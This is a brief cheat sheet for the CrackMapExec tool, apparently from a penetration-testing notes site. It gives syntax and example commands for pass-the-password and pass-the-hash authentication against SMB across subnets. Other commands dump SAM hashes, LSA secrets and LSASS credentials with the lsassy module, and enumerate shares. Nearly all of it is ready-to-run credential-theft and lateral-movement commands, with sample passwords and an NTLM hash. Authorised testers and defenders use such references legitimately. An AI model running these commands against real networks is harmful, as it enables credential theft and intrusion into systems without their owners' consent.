CrackMapExec

Last updated 1 year ago

Pass-the-Password

Syntax: crackmapexec smb [target ip] -u [user] -d [domain] -p [pass]

Domain Authentication

crackmapexec smb 172.16.1.0/24 -u jjones -p buyme_200sx -d alterave.local

Local Authentication

crackmapexec smb 172.16.1.0/24 -u Administrator -p Password1! --local-auth

Pass-the-Hash attacks only work for NTLM hashes.

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth --sam

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --sam

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth --shares

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --shares

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth --lsa

crackmapexec smb 172.16.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --lsa

Syntax: crackmapexec smb [ip/cidr] -u [user] -H [hash] --local-auth -M lsassy

crackmapexec smb 10.1.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy

cmedb

Last updated 1 year ago